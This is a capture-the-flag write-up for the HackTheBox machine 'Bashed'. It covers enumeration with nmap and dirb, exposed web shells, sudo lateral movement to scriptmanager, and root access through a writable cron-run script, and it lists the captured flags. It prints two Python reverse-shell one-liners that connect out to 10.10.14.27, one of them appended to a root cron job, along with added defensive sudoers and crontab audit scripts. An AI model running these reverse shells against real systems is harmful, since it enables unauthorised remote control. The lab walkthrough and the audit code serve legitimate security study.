🥊Bashed
#cyber #ctf #hackthebox #writeup #apache #penetration-test #web #common-appliances #Reconnaissance #web-site-structure-discovery #sudo #cron #os-command-injection #code-execution
Information and Loot
Users
scriptmanager
Flags
user: e0ff0c950c7097fff16d4ba2a2836676
root: f7bb617bb6b0529801882332abf95da3
Enumeration
Nmap
nmap -sC -sV -p- -T 4 10.10.11.208 --min-rate 5000
sudo nmap -sS -sC -sV -oA nmap/initial 10.10.10.68 -F -v
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 16:35 AEDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating Ping Scan at 16:35
Scanning 10.10.10.68 [4 ports]
Completed Ping Scan at 16:35, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:35
Completed Parallel DNS resolution of 1 host. at 16:35, 0.00s elapsed
Initiating SYN Stealth Scan at 16:35
Scanning 10.10.10.68 [100 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed SYN Stealth Scan at 16:35, 0.10s elapsed (100 total ports)
Initiating Service scan at 16:35
Scanning 1 service on 10.10.10.68
Completed Service scan at 16:35, 6.04s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.68.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.35s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.05s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Nmap scan report for 10.10.10.68
Host is up (0.016s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
NSE: Script Post-scanning.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
Raw packets sent: 104 (4.552KB) | Rcvd: 101 (4.044KB)
HTTP
In dirb the wordlist is a positional argument and -w means "do not stop on warning messages"; this run gave no wordlist, so dirb fell back to its default common.txt, as the output confirms.
dirb http://10.10.10.68 -w
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 29 16:42:31 2022
URL_BASE: http://10.10.10.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.68/ ----
==> DIRECTORY: http://10.10.10.68/css/
==> DIRECTORY: http://10.10.10.68/dev/
==> DIRECTORY: http://10.10.10.68/fonts/
==> DIRECTORY: http://10.10.10.68/images/
+ http://10.10.10.68/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://10.10.10.68/js/
==> DIRECTORY: http://10.10.10.68/php/
+ http://10.10.10.68/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.68/uploads/
Contents of /dev are exposed, revealing some interesting files.

Both of the files found there give the tester a web shell on the host.

Exploitation
Reverse shell
export RHOST="10.10.14.27";export RPORT=3435;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

User arrexel's home directory was readable by the www-data user, which allowed the tester to read user.txt.

Post Exploitation
Lateral Movement
Checking www-data's sudo privileges reveals a misconfiguration that allows the user to execute any command as the scriptmanager user.
sudo -l

sudo -u scriptmanager /bin/bash

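The rule abused above is a sudoers delegation from a service account to a second user. The script below is an added example, not code from the box or the original writeup: it parses a sudoers file and flags rules that let a non-administrative principal run commands as someone else, ranking unrestricted (ALL) and NOPASSWD rules highest. The sample sudoers content is constructed; the www-data line is an assumed reconstruction of what would produce the behaviour described, since the real file is not shown here.

```python
"""Audit a sudoers file for delegation rules that give a low-privilege account
(such as a web server's www-data) command execution as another user.

Added example for this writeup; not code from the box or the original post.
"""
import re

# Constructed sample. The www-data rule is an assumed reconstruction of what
# would produce the `sudo -u scriptmanager /bin/bash` step in the writeup;
# the box's real /etc/sudoers is not shown there.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
deploy   ALL=(ALL) ALL
"""

# Principals whose broad rules are expected on a stock Debian/Ubuntu install.
TRUSTED = {"root", "%sudo", "%admin", "%wheel"}

# user/group  host = (runas_user[:runas_group]) [TAG:]... commands
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def parse_sudoers(text):
    """Return a list of dicts, one per user-specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # aliases, includes and anything else not modelled here
        runas = (m.group("runas") or "root").split(":")[0].strip()
        cmds = m.group("cmds").strip()
        tags = set()
        while (t := TAG_RE.match(cmds)):   # strip NOPASSWD:, SETENV:, ... prefixes
            tags.add(t.group(1))
            cmds = cmds[t.end():]
        rules.append({"who": m.group("who"), "host": m.group("host"),
                      "runas": runas, "tags": tags, "cmds": cmds})
    return rules


def classify(rule):
    """Severity and reason for one rule, or None when the rule is expected."""
    if rule["who"] in TRUSTED:
        return None
    nopasswd = "NOPASSWD" in rule["tags"]
    if rule["cmds"] == "ALL":
        severity = "high"   # any command as runas: full takeover of that account
        reason = f"{rule['who']} can run any command as {rule['runas']}"
    else:
        severity = "medium" if nopasswd else "low"
        reason = f"{rule['who']} can run {rule['cmds']} as {rule['runas']}"
    if nopasswd:
        reason += " without a password"
    return severity, reason


def audit(text):
    """Parse and classify; returns findings in file order."""
    findings = []
    for rule in parse_sudoers(text):
        verdict = classify(rule)
        if verdict:
            severity, reason = verdict
            findings.append({"who": rule["who"], "runas": rule["runas"],
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"[{f['severity']:6}] {f['reason']}")
```

Run it against a real file with audit(open("/etc/sudoers").read()) as root; anything reported as high for a service account is the same class of problem the writeup exploits, whether or not a password is required.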
Privilege Escalation
Using the linpeas.sh script, the tester noticed a folder, /scripts, owned by the scriptmanager user.

Looking at the metadata of the test.txt file, the tester noticed that it had been generated within the last minute. This implies that it was being regenerated every minute by a scheduled task. The test.txt file was owned by the root user, meaning that the scheduled task was being run by root.
The tester modified test.py to establish a reverse shell as root on the job's next run by appending the following line to the file.
echo 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.27",3436));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")' >> test.py

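The root cause here is a root-owned scheduled task executing a file in a directory that a lower-privileged user controls. The following script is an added example, not code from the box or the original writeup: it walks a crontab, and for every absolute path a job references it checks the file and each parent directory for non-root ownership or group/world write bits, because a user who owns the directory can replace the script even when the file itself is root-owned. The crontab line, the uid and the file metadata are constructed to match the writeup's description (a per-minute root job running from /scripts, owned by scriptmanager); the real crontab is not shown on the page. The LiveFS adapter is the hypothetical glue for running the same check against a real system.

```python
"""Flag root cron jobs that execute files a non-root user could modify.

Added example for this writeup; not code from the box or the original post.
The writeup only states that root's job regenerates test.txt every minute
from /scripts, which scriptmanager owns; the crontab line and the file
metadata below are constructed to match that description.
"""
import os
import shlex
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "uid mode")  # mode = permission bits only

SCRIPTMANAGER_UID = 1001  # assumed uid for the sample

# Constructed metadata for the paths the sample crontab references.
SAMPLE_FS = {
    "/": FileInfo(0, 0o755),
    "/scripts": FileInfo(SCRIPTMANAGER_UID, 0o755),
    "/scripts/test.py": FileInfo(SCRIPTMANAGER_UID, 0o644),
    "/usr": FileInfo(0, 0o755),
    "/usr/local": FileInfo(0, 0o755),
    "/usr/local/bin": FileInfo(0, 0o755),
    "/usr/local/bin/backup.sh": FileInfo(0, 0o755),
    "/opt": FileInfo(0, 0o755),
    "/opt/tool.sh": FileInfo(0, 0o777),
}

# Constructed root crontab: the first line models the writeup's per-minute job.
SAMPLE_ROOT_CRONTAB = """\
SHELL=/bin/sh
* * * * * python3 /scripts/test.py
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * sh /opt/tool.sh
"""


class LiveFS:
    """Adapter so audit_root_crontab() can run against the real filesystem."""

    def get(self, path):
        try:
            st = os.lstat(path)
        except OSError:
            return None
        return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def parse_crontab(text):
    """Yield (schedule, command) for standard five-field entries."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line (@reboot etc. not modelled)
        fields = line.split(None, 5)
        if len(fields) == 6:
            yield " ".join(fields[:5]), fields[5]


def ancestors(path):
    """The path itself followed by each parent directory up to '/'."""
    chain = []
    while True:
        chain.append(path)
        parent = os.path.dirname(path)
        if parent == path:
            return chain
        path = parent


def writable_by_non_root(info):
    """Reasons a non-root user could replace or edit this path, if any."""
    reasons = []
    if info.uid != 0:
        reasons.append(f"owned by uid {info.uid}")
    if info.mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif info.mode & stat.S_IWGRP:
        reasons.append("group-writable")
    return reasons


def audit_root_crontab(crontab_text, fs):
    """Return a finding for every absolute path in a root job whose file, or any
    parent directory, a non-root user could change. A writable parent matters as
    much as the file: the directory owner can rename or replace the script."""
    findings = []
    for schedule, command in parse_crontab(crontab_text):
        for token in shlex.split(command):
            if not token.startswith("/"):
                continue
            for path in ancestors(token):
                info = fs.get(path)
                if info is None:
                    continue  # path not present in the metadata source
                reasons = writable_by_non_root(info)
                if reasons:
                    findings.append({"schedule": schedule, "command": command,
                                     "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_root_crontab(SAMPLE_ROOT_CRONTAB, SAMPLE_FS):
        print(f"{f['schedule']:12} {f['command']:28} {f['path']}: {', '.join(f['reasons'])}")
```

On the sample data the job running /scripts/test.py is reported twice, once for the file and once for the /scripts directory, which is exactly the condition the writeup relies on; the backup job under /usr/local/bin produces no finding. To check a live host, pass the text of /etc/crontab or the root crontab together with LiveFS().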